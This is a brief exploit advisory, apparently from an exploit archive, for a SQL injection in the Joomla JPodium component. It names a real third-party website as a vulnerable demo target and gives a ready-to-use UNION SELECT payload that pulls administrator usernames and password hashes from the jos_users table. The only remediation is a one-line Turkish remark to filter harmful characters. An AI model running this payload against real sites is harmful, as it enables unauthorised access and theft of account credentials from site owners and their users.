The Joomla JPodium component suffers from a remote SQL injection vulnerability.
3af4946ab3981dc7f79c17324ce3a7ff970bb4c96664c8195f2a24d6226dc9bc
<------------------- header data start ------------------- >
#############################################################
Joomla Component jpodium SQL Injection Vulnerability
#############################################################
# Author : Fl0riX ~ Bug Researchers
# Greez: KEDESIGN , Sakkure , All CW And All My Friends.
# Name : Joomla com_jpodium
# Bug Type : SQL injection
# Infection : Admin Login Bilgileri Alinabilir.
# Demo Vuln :
http://www.adelaarcyclingteam.nl/ploeg/index.php?option=com_jpodium&view=portraits&layout=detail&f_id=[EXPLOIT]
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
null+and+1=0+union+select+1,concat(username,0x3a,password)fl0rix,3+from+jos_users--
< -- bug code end of -- >